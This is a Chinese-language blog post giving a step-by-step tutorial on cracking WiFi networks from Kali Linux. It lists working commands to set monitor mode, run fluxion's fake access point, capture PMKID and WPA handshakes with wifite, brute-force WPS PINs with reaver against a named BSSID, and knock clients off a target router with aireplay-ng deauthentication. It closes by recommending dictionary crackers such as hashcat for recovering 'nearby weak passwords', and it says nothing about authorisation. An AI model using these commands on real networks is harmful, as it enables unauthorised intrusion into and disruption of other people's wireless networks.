wifi渗透

文摘   2024-08-07 11:42   湖北  

点击上方蓝字 江湖评谈设为关注/星标




前言

本篇看下wifi渗透的内容,USB类型的免驱可监听无线网卡,vm虚拟机Kali Linux菜单栏-》虚拟机-》可移动设备-》Ralin802连接。wifite可以查看客户端连接人数,便于抓包。ewsa可以查看网络是哪种类型,比如wpa,wpa2类型。wash -i wlan0可以查看wps是否加锁设置。

fluxsion

下载:

git clone https://github.com/FluxionNetwork/fluxion.git

进入fluxion目录,然后运行命令行带上-i ,带上-i让它下载缺失的组件

cd fluxion./fluxion.sh -i

扫描到的的SSID绿色即为有客户端,可以抓包

攻击类型

wpa/wpa2的PSK攻击分为以下五种:pmkid攻击,根据wpa的四次握手传输的pmk码,随机码,进行逆向攻击。wps pin攻击,这个共计需要路由器开启wps,并且lck没有锁定,可以通过reaver来进行攻击。pixie攻击,区分路由器的生产商,以及路由漫游等功能进行攻击。抓握手包跑字典,fluxion的虚拟AP。等五种常用攻击方式。

wifite

wifite要进行pmkid攻击需要工具hcxtools,安装如下:

apt-get install hcxtools

打开网卡监听模式

sudo    ip    link    set      wlan0    downsudo    iw    dev     wlan0    set      type    monitorsudo    ip    link    set      wlan0    upsudo    airmon-ng     check    kill

开启抓包

sudo     wifite   --skip-crack其中 --no-wps选项跳过wps攻击, --no-pmkid跳过pmkid攻击,--skip-crack跳过用wifite跑包,-5的话是监听5G频段

ctrl+c输入编号,然后当前目录hs文件夹下面是抓包文件

wps+Pin

查看当前网卡名,当前是wlan0

ip l

Kali下面可以用如下命令搜索WPS开启的Mac机器(也可以通过wifite来查看wps的开启)

wash -i wlan0

通过Mac来计算pin和psk

sudo reaver -i wlan0 -b F0:55:01:77:EA:1C  -c 1 -vvsudo reaver -i wlan0 -c [channel] -b [bssid] -v -S -d 0 -t 1sudo reaver -i wlan0 -b <目标网络的BSSID-c <目标网络的信道> -vv-i:无线网卡   -bmac地址  -c:CH值   -vv:详细信息

Kali Linux Cap包

结束无线进程:

sudo  airmon-ng  check   kill

查看周边无线的CH值

sudo airodump-ng  wlan0

扫描CH值所在的无线网络

sudo  airodump-ng   -c  CH值   -w 保存数据包的文件名   wlan0

新开一个窗口,对扫描CH值所在的无线网路进行断网抓包

sudo   aireplay-ng   -a   目标AP的mac地址    -0  4    wlan0

如果扫描CH值窗口出现了类似如下(CH值为11的mac地址为D0:76:E7:A3:2F:B4的wifi):

CH 11 ][ Elapsed: 54 s ][ 2024-06-29 15:50 ][ WPA handshake: D0:76:E7:A3:2F:B4

则表示抓包成功,可以到kali linux的/home/user目录下找到扩展名为.cap的文件,即是抓包后的文件。

结尾

抓包工具则可以wifite,fluxion即可抓到高质量包。最后需要工具跑下字典,比如wifipr(Wireless Password Recovery)就很不错,ewsa(Elcomsoft Wireless Security Auditor)等,还有hashcat。这几个基本上可以跑出周边弱密码。

往期精彩回顾

危险,横跨.NET/6/7/8三个版本的栈漏洞



江湖评谈
记录,分享,自由。
 最新文章